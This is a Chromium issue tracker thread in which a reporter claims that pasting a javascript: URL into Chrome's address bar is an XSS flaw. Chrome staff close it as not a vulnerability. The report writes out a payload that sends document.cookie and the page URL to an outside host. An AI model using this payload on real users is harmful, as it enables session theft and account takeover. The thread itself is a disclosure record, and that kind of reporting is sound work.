Issue metadata
Sign in to add a comment
|
rXSS, Leveraginh URL Bar for DOCUMENT.COOKIE Extraction (GOOGLE CHROME)
Reported by
benjamin...@gmail.com,
Aug 15
|
||||||||||||||||||
Issue descriptionVULNERABILITY DETAILS Using the payload javascript':window.location.href= 'http://hckerman.000webhostapp.com/CreateChar.php?CHARS=' + String(document.cookie) + '&url=' + window.location.href and erasing the first ' Google chrome will load that as href="javascript:window.location.href= 'http://hckerman.000webhostapp.com/CreateChar.php?CHARS=' + String(document.cookie) + '&url=' + window.location.href" or something along those lines. This method will take social engineering or a small time frame of physical access to the device, but regardless this should not occur. In the attached video you will see the interception, of Facebook, mail.google.com, and Twitter cookies. VERSION Chrome Version: 68.0.3440.106 Operating System: Windows, and Chromeos (note: Potentialyl MAC, have not attempted) REPRODUCTION CASE Link of demonstration and reproduction: https://youtu.be/PNuoxYvEAVE
,
Aug 15
Hi, thanks for the report, however we do not consider entering Javascript in the URL bar as a vulnerability, you can read more about it at: https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-
,
Aug 15
Sorry, I apologize for the inconvenient report. I'll ensure to read the guidelines thoroughly prior to reporting again. Thank you
,
Nov 22
This bug has been closed for more than 14 weeks. Removing security view restrictions. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot |
|||||||||||||||||||
►
Sign in to add a comment |
|||||||||||||||||||
Comment 1 by benjamin...@gmail.com
, Aug 15